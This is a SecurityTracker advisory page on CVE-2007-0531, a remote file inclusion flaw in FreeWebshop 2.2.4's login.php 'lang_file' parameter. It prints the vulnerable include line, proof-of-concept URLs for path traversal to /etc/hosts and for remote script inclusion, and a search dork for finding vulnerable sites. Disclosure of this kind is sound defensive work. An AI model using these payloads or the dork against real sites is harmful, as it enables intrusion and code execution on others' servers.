FreeWebshop Include File Bug in '/includes/login.php' Lets Remote Users Execute Arbitrary Code - SecurityTracker

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Category: Application (Commerce) > FreeWebshop

Vendors: FreeWebshop.org

FreeWebshop Include File Bug in '/includes/login.php' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1017549

SecurityTracker URL: http://securitytracker.com/id/1017549

CVE Reference: CVE-2007-0531 (Links to External Site)

Updated: May 19 2008

Original Entry Date: Jan 24 2007

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 2.2.4

Description: David Sopas Ferreira a.k.a SmOk3 reported a vulnerability in FreeWebshop. A remote user can include and execute arbitrary code on the target system.

The '/includes/login.php' script does not properly validate user-supplied input in the 'lang_file' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some deomonstration exploit URLs are provided:

/includes/login.php?lang_file=../../../../../../etc/hosts
/includes/login.php?lang_file=[evilscript]

The vendor has been notified.

The original advisory is available at:

http://14house.blogspot.com/2007/01/freewebshoporg-remote-file-inclusion.html

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry. The vendor is working on a fix.

Vendor URL: www.freewebshop.org/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Subject: FreeWebShop.org Remote File Inclusion Flaw

FreeWebShop.org Remote File Inclusion Flaw

Software: FreeWebshop.org v2.2.4
Vendor link: http://www.freewebshop.org // info@freewebshop.org
Attack: Remote File Inclusion

Discovered by: David Sopas Ferreira a.k.a SmOk3 <mail>smok3f00 at
gmail.com</mail>
Original advisory:
http://14house.blogspot.com/2007/01/freewebshoporg-remote-file-inclusion.html

Google dork:"Powered by FreeWebshop.org"


Vulnerable Code:

-- /includes/login.php --

(...) line 38
include ($lang_file);
(...)


Proof of Concept:

/includes/login.php?lang_file=../../../../../../etc/hosts
/includes/login.php?lang_file=[evilscript]

Solution:
Vendor was contacted and will fix this soon.

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
This web site uses cookies for web analytics. Learn More
Copyright 2020, SecurityGlobal.net LLC